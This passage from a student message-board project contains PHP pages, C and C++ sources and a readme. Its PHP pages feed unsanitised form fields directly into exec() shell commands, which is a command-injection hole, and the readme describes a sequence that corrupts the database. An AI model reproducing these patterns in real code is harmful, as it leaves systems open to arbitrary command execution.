*/\nif(isset($_POST[\"action\"]))\n{\n\tif($_POST[\"action\"] == \"add\")\n\t{\n\t\t$sstring = \"\";\n\t\tforeach($_POST[\"streams\"] as $stream)\n\t\t{\n\t\t\t$sstring = $sstring.$stream.',';\n\t\t}\n\t\t$sstring = $sstring.$_POST[\"newstreams\"];\n\t\t$username = $_POST[\"username\"];\n\t\tif($sstring{strlen($sstring) - 1} === ',')\n\t\t{\n\t\t\t$sstring = substr($sstring, 0, -1);\n\t\t}\n\t\t$sstring = trim($sstring);\n\t\t$sstring = str_replace(' ', '', $sstring);\n\t\texec(\"./addauthor $username $sstring\", $aout, $ares);\n\t}\n\telseif($_POST[\"action\"] == \"remove\")\n\t{\n\t\t$sstring = \"\";\n\t\tforeach($_POST[\"streams\"] as $stream)\n\t\t{\n\t\t\t$sstring = $sstring.$stream.',';\n\t\t}\n\t\t$sstring = substr($sstring, 0, -1);\n\t\t$username = $_POST[\"username\"];\n\n\t\texec(\"./addauthor $username $sstring -r\", $aout, $ares);\n\t}\n}\n\nexec(\"./create addauthor.wpml\", $output, $result);\ninclude \"interpret.php\";\n\n?>\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.5786259770393372, "alphanum_fraction": 0.580152690410614, "avg_line_length": 19.46875, "blob_id": "37f5730a582ae01f710567cd5dcfa02c7b8fdb03", "content_id": "316ec89c45d150ab97cbbf60981e2553bfc115f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 655, "license_type": "no_license", "max_line_length": 135, "num_lines": 32, "path": "/post.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n<body>\n\n<head>\n\t<title>Post Submitted</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<?php\n\nexec(\"./create post.wpml\", $output, $result);\ninclude \"interpret.php\";\n\nif(isset($_POST[\"postpressed\"]))\n{\n\texec(\"./post \\\"\".$_POST[\"username\"].\"\\\" \\\"\".$_POST[\"stream\"].\"\\\" \\\"\".$_POST[\"post\"].\"\\n\\\"\", $pout, $pres);\n\n\techo \"<div id=\\\"card\\\">\";\n\tif($pres > 0)\n\t{\n\t\techo \"<br><br><p style=\\\"text-align: center\\\">Something went wrong while postng.<br>Nothing seems to have been written.</p><br><br>\";\n\t}\n\telse\n\t{\n\t\techo \"<br><br><p style=\\\"text-align: center\\\">Post Submitted!</p><br><br>\";\n\t}\n\techo \"</div>\";\n}\n\n?>\n</body>\n</html>\n" }, { "alpha_fraction": 0.6275168061256409, "alphanum_fraction": 0.6275168061256409, "avg_line_length": 15.55555534362793, "blob_id": "bbec7050965cdae79cc7433ee2b8f67b25a56a08", "content_id": "ecf29f8799018590d397b669ffc89e8b5890a2ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 298, "license_type": "no_license", "max_line_length": 78, "num_lines": 18, "path": "/index.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Message Login</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\nexec(\"./create index.wpml\", $output, $result);\ninclude \"interpret.php\";\n\necho \"<input type=\\\"hidden\\\" name=\\\"first\\\" value=\\\"yes\\\" form=\\\"gotoview\\\">\";\n?>\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.6710929274559021, "alphanum_fraction": 0.6802859902381897, "avg_line_length": 25.106666564941406, "blob_id": "86a27e64a2e87be8afb2a480f5ebcbfe7d63ef9e", "content_id": "10d3fd89bf00e97dabe86c500efdc63c15a921a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1958, "license_type": "no_license", "max_line_length": 79, "num_lines": 75, "path": "/stream.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the library API for the stream lib.\n *\tThese functions are used to modify stream files in messages/\n */\n#ifndef __GSOVERNIGO_STREAM_H__\n#define __GSOVERNIGO_STREAM_H__\n\n#include <mysql/mysql.h>\n\nstruct userPost\n{\n\tchar* username;\n\tchar* streamname;\n\tchar* date;\n\tchar* text;\n};\n\n\n/**\n *\n */\nchar* compdate();\n\n/**\n * \tupdateStream\n * \tPosts a userpost to the file identified in it.\n *\tIN:\t\t\tst\t\t\t- the userpost struct we want to post\n *\t\t\t\t\t\t\t to.\n *\tOUT:\t\treturns 0 on success.\n *\tPOST:\t\tst has been written to its appropriate stream file in messages/\n *\tERROR:\t\tst is null, or any of their fields are invalid or null\n */\nint updateStream(struct userPost* st);\n\n/**\n *\taddUser\n *\tadds a user to a stream file. files are called messages/<stname>StreamUsers\n *\tIN:\t\t\tusername\t- a username we will add\n *\t\t\t\tlist\t\t- a list of streams to be added to.\n *\tOUT:\treturns 0 on success.\n *\tPOST:\tusername has been added to all files specified by list.\n *\tERROR:\tlist contains references to files which are too privilledged.\n */\nint addUser(char* username, char* list);\n\n/**\n *\tremoveUser\n *\tremoves a user from the files specified in list.\n *\tIN:\t\t\tusername\t- the username we will be removing.\n *\t\t\t\tlist\t\t- the list of streams to remove the user from.\n *\tOUT:\t\treturns 0 on success.\n *\tPOST:\t\tusername has been removed from all files named in list.\n *\tERROR:\t\tusername does not exist in the file, or list contains references\n *\t\t\t\tto streams that we cannot access.\n */\nint removeUser(char* username, char* list);\n\n/**\n *\tcheckIfPresent\n *\tchecks if a word is present inside the file named in fname.\n *\tIN:\t\t\tfname\t\t- the file name we will be checking.\n *\t\t\t\tword\t\t- the word to search for.\n *\tOUT:\t\t1 if word is present in file, 0 if not.\n *\tPOST:\t\tinteger returned.\n *\tERROR:\t\tfname is invalid or null, word is null.\n */\nint checkIfPresent(char* fname, char* word);\n\n#endif\n" }, { "alpha_fraction": 0.6559337377548218, "alphanum_fraction": 0.6706531643867493, "avg_line_length": 35.233333587646484, "blob_id": "e04e65eebbf547cc947d1d459961c4c32047dfd4", "content_id": "62f09630929e5fb8b0f3a04e6910e3d25f7a1c8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2174, "license_type": "no_license", "max_line_length": 77, "num_lines": 60, "path": "/readme.txt", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "*************************************************\nJulian Sovernigo 0948924\[email protected]\nCIS2750_W17 A4: SQL and Messages\n3/31/2017\n*************************************************\n\n******************\nPledge of Honesty\n******************\n By handing in this assignment with this README file, I\nassert that I have sole access and control over my submission,\nand that this submission contains entirely my own work. I\naffirm that I have not colaborated in the creation of this code,\nnor have I taken any segment of code that I do not have express\nownership or permission to use.\n\n************\nCompilation\n************\n\n1- cd to the root folder of the program\n2- type 'make' in the root folder.\n3- to remove resources generated by compilation, please type 'make clean'\n\n********************\nRunning the program\n********************\n\n1- cd to the root folder of the program\n2- 3 programs, post, addauthor, and view.py exist, as well as db.\n\n************\nLimitations\n************\n\n\tWith the manipulation of the forward/backward arrows on a browser,\nthe passing of items between two pages can be desynchronized, and broken.\nIf you want to transition pages, change using the back button provided on\nthe page only, unless none is provided, in which case, the back arrow is \nsafe to use.\n\n\tAlso please note that he change author, and the add/remove author page\nis available through the same button in the top left hand corner. This was\ndone to preserve the propogation of values between pages.\n\n\tIt is also possible to manipulate the user into being able to post in\na stream that they do not belong to. This can be done by:\n\t- logging in as a user 'A'\n\t- selecting stream '1'\n\t- logging in another tab as user 'B'\n\t- selecting stream '1'\n\t- posting as 'B' to '1'\n\t- entering the post screen as user 'A' for '1'\n\t- removing user 'A' from stream '1', using 'B''s tab\n\t- posting as 'A' in the now locked stream.\n\tThis sequence can be used to break the way the post-read cycle operates,\nallowing the desynchronization and eventual damage to the database (causes\npermenant seg-faults as user 'A', since the user still has a registered last-\nread field in his info section.\n" }, { "alpha_fraction": 0.5891987681388855, "alphanum_fraction": 0.6097831130027771, "avg_line_length": 17.983192443847656, "blob_id": "5de0c9c63d3a14fd1870b4266d974d64b9f8ab2a", "content_id": "bf76c1555e13c29b1fb544e5241fc46c48f1c425", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4518, "license_type": "no_license", "max_line_length": 162, "num_lines": 238, "path": "/post.cc", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains the C++Lite code for functions designed to\n *\tcollect and post information to a message board.\n */\n \n#include \"stream.h\"\n#include <time.h>\n#include <string.h>\n#include <stdlib.h>\n#include <stdio.h>\n\nclass PostEntry\n{\n\n\tchar* readInput()\n\t{\n\t\tint currentSize;\n\t\tint currentLen;\n\n\t\tchar temp[256];\n\t\tchar* text;\n\n\t\ttext = malloc(sizeof(char) * 512);\n\t\t/* check if malloc failed */\n\t\tif(text == NULL)\n\t\t{\n\t\t\treturn NULL;\n\t\t}\n\n\t\t/* sets up the string's inital parameters. */\n\t\tcurrentSize = 512;\n\t\ttext[0] = '\\0';\n\t\tcurrentLen = 0;\n\n\t\t/* puts the initial prompt on the screen */\n\t\tfputs(\"Please enter your text: \", stdout);\n\t\twhile(fgets(temp, 255, stdin) != NULL)\n\t\t{\n\t\t\tfputs(\"- \", stdout);\n\n\t\t\t/* adds the total size to the currently stored size */\n\t\t\tcurrentLen += strlen(temp);\n\t\t\tif(currentLen >= currentSize)\n\t\t\t{\n\t\t\t\t/* add extra length to the string */\n\t\t\t\ttext = doubleString(text, &currentSize);\n\t\t\t}\n\n\t\t\t/* add it to the total buffer we are using. */\n\t\t\tstrcat(text, temp);\n\t\t}\n\t\tputs(\"\\n\");\n\n\t\tif(text[strlen(text) - 1] == '\\n' && text[strlen(text) - 2] == '\\n')\n\t\t{\n\t\t\ttext[strlen(text) - 1] = '\\0';\n\t\t}\n\n\t\treturn text;\n\t}\n\n\tchar* getTimeDate()\n\t{\n\t\tchar month[4];\n\n\t\tchar* timeStamp;\n\t\ttime_t rawNow;\n\n\t\tstruct tm * now;\n\n\t\t/* gets the raw time from the clock */\n\t\trawNow = time(NULL);\n\t\tnow = localtime(&rawNow);\n\n\t\t/* mallocs the time stamp we are using for the current date. */\n\n\t\ttimeStamp = malloc(sizeof(char) * strlen(\"MON. DD, YYYY HH:MM PM\") + 1);\n\n\t\t/* essentially creates the month based on the local timestamp */\n\t\tswitch(now->tm_mon)\n\t\t{\n\t\t\tcase(0):\n\t\t\t\tstrcpy(month, \"Jan\");\n\t\t\t\tbreak;\n\t\t\tcase(1):\n\t\t\t\tstrcpy(month, \"Feb\");\n\t\t\t\tbreak;\n\t\t\tcase(2):\n\t\t\t\tstrcpy(month, \"Mar\");\n\t\t\t\tbreak;\n\t\t\tcase(3):\n\t\t\t\tstrcpy(month, \"Apr\");\n\t\t\t\tbreak;\n\t\t\tcase(4):\n\t\t\t\tstrcpy(month, \"May\");\n\t\t\t\tbreak;\n\t\t\tcase(5):\n\t\t\t\tstrcpy(month, \"Jun\");\n\t\t\t\tbreak;\n\t\t\tcase(6):\n\t\t\t\tstrcpy(month, \"Jul\");\n\t\t\t\tbreak;\n\t\t\tcase(7):\n\t\t\t\tstrcpy(month, \"Aug\");\n\t\t\t\tbreak;\n\t\t\tcase(8):\n\t\t\t\tstrcpy(month, \"Sep\");\n\t\t\t\tbreak;\n\t\t\tcase(9):\n\t\t\t\tstrcpy(month, \"Oct\");\n\t\t\t\tbreak;\n\t\t\tcase(10):\n\t\t\t\tstrcpy(month, \"Nov\");\n\t\t\t\tbreak;\n\t\t\tcase(11):\n\t\t\t\tstrcpy(month, \"Dec\");\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t/* error case, this will be because localtime() has failed for some reason. */\n\t\t\t\tbreak;\n\t\t}\n\t\t/* prints the final format to the string to be returned. */\n\t\tsprintf(timeStamp, \"%3s. %2d, %4d %02d:%02d %2s\", month, now->tm_mday, now->tm_year + 1900, now->tm_hour % 12, now->tm_min, (now->tm_hour / 12 > 0 )?\"PM\":\"AM\");\n\t\ttimeStamp[22] = '\\0';\n\n\n\t\treturn timeStamp;\n\t}\n\n\tstruct userPost* formatEntry(char* username, char* streamname, char* text)\n\t{\n\t\tchar* timeStamp;\n\t\t\n\t\tstruct userPost* newPost;\n\n\t\tnewPost = malloc(sizeof(struct userPost));\n\t\t/* if malloc has for some reason failed */\n\t\tif(newPost == NULL)\n\t\t{\n\t\t\treturn NULL;\n\t\t}\n\n\t\ttimeStamp = getTimeDate();\n\n\t\t/* mallocs the items in the struct */\n\t\tnewPost->username = malloc(sizeof(char) * strlen(username) + 1);\n\t\tnewPost->streamname = malloc(sizeof(char) * strlen(streamname) + 1);\n\t\tnewPost->date = malloc(sizeof(char) * strlen(timeStamp) + 1);\n\t\tnewPost->text = malloc(sizeof(char) * strlen(text) + 1);\n\t\t\n\t\t/* copies the info into the struct. */\n\t\tstrcpy(newPost->username, username);\n\t\tstrcpy(newPost->streamname, streamname);\n\t\tstrcpy(newPost->date, timeStamp);\n\t\tstrcpy(newPost->text, text);\n\t\t\n\t\tfree(timeStamp);\n\n\t\treturn newPost;\n\t}\n\n\tint submitPost(struct userPost* post)\n\t{\n\t\tif(post == NULL)\n\t\t{\n\t\t\treturn -1;\n\t\t}\n\n\t\treturn updateStream(post);\n\t}\n};\n\nchar* doubleString(char* currentString, int * currentLen)\n{\n\tint i;\n\tchar* newString;\n\n\t/* creates a new string, twice as long */\n\tnewString = malloc(sizeof(char) * (*currentLen) * 2 + 1);\n\t*currentLen *= 2;\n\n\t/* copy the old string */\n\tfor(i = 0; i < strlen(currentString); i++)\n\t{\n\t\tnewString[i] = currentString[i];\n\t}\n\n\t/* frees the old string */\n\tfree(currentString);\n\n\treturn newString;\n}\n\nint main(int argc, char** argv)\n{\n\tint result;\n\tchar userName[512];\n\tchar* post;\n\tchar stream[512];\n\n\tstruct userPost* pt;\n\n\tclass PostEntry pe;\n\n\tif(argc < 4)\n\t{\n\t\treturn 1;\n\t}\n\n\tstrcpy(userName, argv[1]);\n\tstrcpy(stream, argv[2]);\n\tpost = malloc(sizeof(char) * (strlen(argv[3]) + 1));\n\tstrcpy(post, argv[3]);\n\n\tpt = pe.formatEntry(userName, stream, post);\n\tresult = pe.submitPost(pt);\n\n\tfree(pt->username);\n\tfree(pt->streamname);\n\tfree(pt->date);\n\tfree(pt->text);\n\tfree(pt);\n\n\tfree(post);\n\n\tif(result != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.4698244631290436, "alphanum_fraction": 0.49230584502220154, "avg_line_length": 17.81900405883789, "blob_id": "f850d95e7d7c2c6dafbbd27d3bbe90c387833467", "content_id": "876bac2249d539235d628fe7f5231d3910f6e7a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 8318, "license_type": "no_license", "max_line_length": 97, "num_lines": 442, "path": "/parseFile.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tThis file contains several methods for parsing a file into tokens\n * \tthat, if printed again in that order, will constitute a working cpp\n * \tprogram.\n */\n#include\"parseFile.h\"\n#include<stdio.h>\n#include<string.h>\n#include<stdlib.h>\n\n#include<assert.h>\n\nVector* getTokens(char* fname)\n{\n\tchar c;\n\tchar lastPrint;\n\tint i;\n\n\tint inString;\n\tint in89Comment;\n\tint in99Comment;\n\t/*\n\tint inInclude;\n\t*/\n\tchar* buffer;\n\n\tFILE* fin;\n\tVector* tokens;\n\n\tfin = fopen(fname, \"r\");\n\tif(fin == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tbuffer = malloc(sizeof(char)*512);\n\n\tlastPrint = '\\0';\n\n\tinString = 0;\n\tin89Comment = 0;\n\tin99Comment = 0;\n\t/*inInclude = 0;*/\n\ti = 0;\n\n\t/* sets up the vector to be filled */\n\ttokens = makeVector(100);\n\n\t/* collects the characters into tokens one char at a time */\n\tdo\n\t{\n\t\tc = fgetc(fin);\n\n\t\tif(strchr(\"\\n\\t\\r \", c) != NULL)\n\t\t{\n\t\t\t/* if we need to preserve whitespace right now. */\n\t\t\tif(inString == 1 || in89Comment == 1)\n\t\t\t{\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = c;\n\t\t\t}\n\t\t\telse if(in99Comment == 1)\n\t\t\t{\n\t\t\t\tif(c == '\\n' || c == '\\r')\n\t\t\t\t{\n\t\t\t\t\tchar* newString;\n\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\ti = 0;\n\t\t\t\t\tin99Comment = 0;\n\n\t\t\t\t\tnewString = malloc(sizeof(char) * 3);\n\t\t\t\t\tnewString[0] = c;\n\t\t\t\t\tnewString[1] = '\\0';\n\n\t\t\t\t\tappendString(tokens, newString, strlen(newString));\n\t\t\t\t\tfree(newString);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t{\n\t\t\t\tchar* newString;\n\n\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\ti++;\n\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\tlastPrint = '\\0';\n\t\t\t\ti = 0;\n\n\t\t\t\tnewString = malloc(sizeof(char) * 3);\n\t\t\t\tnewString[0] = c;\n\t\t\t\tnewString[1] = '\\0';\n\n\t\t\t\tappendString(tokens, newString, strlen(newString));\n\t\t\t\tfree(newString);\n\t\t\t}\n\t\t}\n\t\telse if(strchr(\".,;(){}[]\", c) != NULL) /* this grabs punctuation */\n\t\t{\n\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t{\n\t\t\t\tif(i != 0)\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\ti = 0;\n\t\t\t\t}\n\n\t\t\t\t/* this saves the new token */\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\n\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\ti++;\n\n\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\tlastPrint = '\\0';\n\t\t\t\ti = 0;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tbuffer[i] = c;\n\t\t\t\tlastPrint = c;\n\t\t\t\ti++;\n\t\t\t}\n\t\t}\n\t\telse if(strchr(\"+-*/%=\", c) != NULL)\n\t\t{\n\t\t\tif(c == '/') /* possible comment, or division... */\n\t\t\t{\n\t\t\t\t/* if our last print was a slash too, then we are in a comment right now */\n\t\t\t\tif(lastPrint == '/' && inString == 0)\n\t\t\t\t{\n\t\t\t\t\tin99Comment = 1;\n\t\t\t\t}\n\t\t\t\telse if(lastPrint == '*' && inString == 0)\n\t\t\t\t{\n\t\t\t\t\tin89Comment = 0;\n\t\t\t\t}\n\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = c;\n\t\t\t}\n\t\t\telse if(c == '+' || c == '-')\n\t\t\t{\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\t/* this means we are in a ++ or a -- situation */\n\t\t\t\t\tif(lastPrint == c)\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tlastPrint = c;\n\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tif(i != 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\t\ti++;\n\t\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\t\ti = 0;\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tlastPrint = c;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(c == '*') /* we have found an asterisk... might be a comment... */\n\t\t\t{\n\t\t\t\tif(lastPrint == '/' && inString == 0)\n\t\t\t\t{\n\t\t\t\t\tin89Comment = 1;\n\t\t\t\t}\n\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\t/* this basically identifies the \"**\" in char** argv as one token */\n\t\t\t\t\tif(lastPrint != '*')\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* we need to print something */\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = c;\n\t\t\t}\n\t\t\telse if(c == '%') /* either a modulus or a printf formatter */\n\t\t\t{\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\tif(i != 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = '\\0';\n\t\t\t}\n\t\t\telse if(c == '=')\n\t\t\t{\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\t/* we are in a += kind of situation */\n\t\t\t\t\tif(strchr(\"+-*/%\", lastPrint) != NULL)\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tlastPrint = c;\n\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t\telse if(i != 0) /* if there is currently a non-operator in the buffer */\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\n\t\t\t\t\t/* outside of a string/comment, there is no time when this would be tacked\n\t\t\t\t\t onto anything. */\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\ti = 0;\n\t\t\t\t}\n\t\t\t\telse /* this would run if we found a += in a comment or string */\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse /* essentially, any non-special character. */\n\t\t{\n\t\t\tif(c == '\\\"')\n\t\t\t{\n\t\t\t\t/* if we are not in a string and NOT in a comment, we are now in a string */\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t/* this would be like a \\\" situation in a string */\n\t\t\t\t\tif(lastPrint != '\\\\')\n\t\t\t\t\t{\n\t\t\t\t\t\tinString = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t{\n\t\t\t\t/* if our last print was an operator, we need to print it first */\n\t\t\t\tif(strchr(\"+-*/%\", lastPrint) != NULL)\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\ti = 0;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t/* add the default character */\n\t\t\tbuffer[i] = c;\n\t\t\ti++;\n\t\t\tlastPrint = c;\n\t\t}\n\n\t}while(c != EOF);\n\n\t/* free all the crap we were using */\n\tfree(buffer);\n\tfclose(fin);\n\n\treturn tokens;\n}\n\nint appendString(Vector* v, char* string, int i)\n{\n\tchar* nstr;\n\n\tif(v == NULL || v->contents == NULL || string == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* this ensures real strings are being placed into the vector. */\n\tif(string[0] != '\\0' && i > 0)\n\t{\n\t\tnstr = malloc(sizeof(char) * i + 1);\n\t\tstrcpy(nstr, string);\n\t\tappend(v, nstr);\n\t}\n\telse\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nvoid printProgram(Vector* tokens)\n{\n\tint i;\n\tint tabLevel;\n\n\ttabLevel = 0;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn;\n\t}\n\n\t/* loop through the entirety of the tokens, essentially. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tint j;\n\n\t\t/* these are special characters for printing. They call for special newline rules */\n\t\tif(strstr(\"{};\", (char*) tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tif(i + 1 < tokens->length && strcmp(tokens->contents[i+1], \";\") == 0)\n\t\t\t{\n\t\t\t\tprintf(\"%s\", (char*) tokens->contents[i]);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tprintf(\"%s\\n\", (char*) tokens->contents[i]);\n\t\t\t}\n\t\t\tif(strcmp((char*) tokens->contents[i], \"{\") == 0)\n\t\t\t{\n\t\t\t\ttabLevel ++;\n\t\t\t}\n\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t{\n\t\t\t\ttabLevel --;\n\t\t\t}\n\n\t\t\t/* this ensures proper printing levels for the next couple statements. */\n\t\t\tif(i + 1 < tokens->length && strcmp(tokens->contents[i+1], \"}\") == 0)\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel - 1; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(strstr(tokens->contents[i], \"//\") != NULL || strstr(tokens->contents[i], \"/*\") != NULL)\n\t\t{\n\t\t\tprintf(\"%s\\n\", (char*) tokens->contents[i]);\n\t\t\tif(i + 1 < tokens->length && strcmp(tokens->contents[i+1], \"}\") == 0)\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel - 1; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t/* this ensures that preprocessors are printed on seperate lines. */\n\t\telse if(strstr((char*) tokens->contents[i], \"#include\") != NULL)\n\t\t{\n\t\t\tprintf(\"%s\\n\", (char*) tokens->contents[i]);\n\t\t}\n\n\t\telse\n\t\t{\n\t\t\tprintf(\"%s \", (char*)tokens->contents[i]);\n\t\t}\n\t}\n\treturn;\n}\n" }, { "alpha_fraction": 0.5926828980445862, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 14.769230842590332, "blob_id": "d2350e008a9d37cd522b2e470b59aba478d4b367", "content_id": "1a2941ce4e43542a79bc4ef33f90f3b188077e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 410, "license_type": "no_license", "max_line_length": 73, "num_lines": 26, "path": "/main.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the main method. This program is intended to\n *\tconvert cppL files to C files (see CFront for more info on the concept\n *\tof converting cpp to c)\n */\n#include\"driver.h\"\n#include<stdio.h>\n\nint main(int argc, char** argv)\n{\n\tif(argc < 